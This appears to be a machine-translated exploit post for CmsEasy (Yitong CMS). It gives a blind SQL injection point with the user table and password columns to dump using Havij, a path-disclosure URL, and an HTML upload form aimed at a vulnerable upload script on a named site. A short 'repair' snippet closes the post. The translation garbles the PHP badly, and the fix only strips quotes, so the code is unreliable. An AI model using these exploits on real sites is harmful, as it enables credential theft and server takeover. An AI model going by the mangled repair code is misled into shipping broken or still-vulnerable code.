Cmseasy (Yitong CMS) injection vulnerability Upload Vulnerability path ODAY (including repair)

Injection Vulnerability
 
Injection point:/celive/js/include. php? Cmseasylive = 1111 & found mentid = 0
Type: mysql blind-string
Keyword: online.gif
Table Name: cmseasy_user
List: userid, username, password
Run it directly in Havij. Error Keyword: online.gif Add Table Name: cmseasy_user list: userid, username, password Keyword: Powered by CmsEasy
 
 
 
Violent path ODAY
 
Directly put the explosion path such as: http://www.bkjia.com/index. php? Case = archive
 
Upload Vulnerability
 
Exp:
 
<Form enctype = "multipart/form-data" method = "post" action = "http://www.8090sec.com/celive/live/doajaxfileupload.php">
<Input type = "file" name = "fileToUpload">
<Input type = "submit" value = "Upload">
</Form>
 
Injection Vulnerability repair:
 
Open the/celive/js/include. php file and go to line 52 or the Code of this function.
 
If (isset ($ _ GET ['inclumentid']) {
$ Inclumentid = $ _ GET ['inclumentid'];
$ Activity_ SQL = "SELECT 'id' FROM '". $ config ['prefix']. "activity 'where' then mentid '= '". $ initialize mentid. "'AND 'operatorid' = '". $ operatorid. "'";
Change the code
If (isset ($ _ GET ['inclumentid']) {
$ Reply mentid = str_replace ("'", "", $ _ GET ['reply mentid']);
$ Activity_ SQL = "SELECT 'id' FROM '". $ config ['prefix']. "activity 'where' then mentid '= '". $ initialize mentid. "'AND 'operatorid' = '". $ operatorid. "'";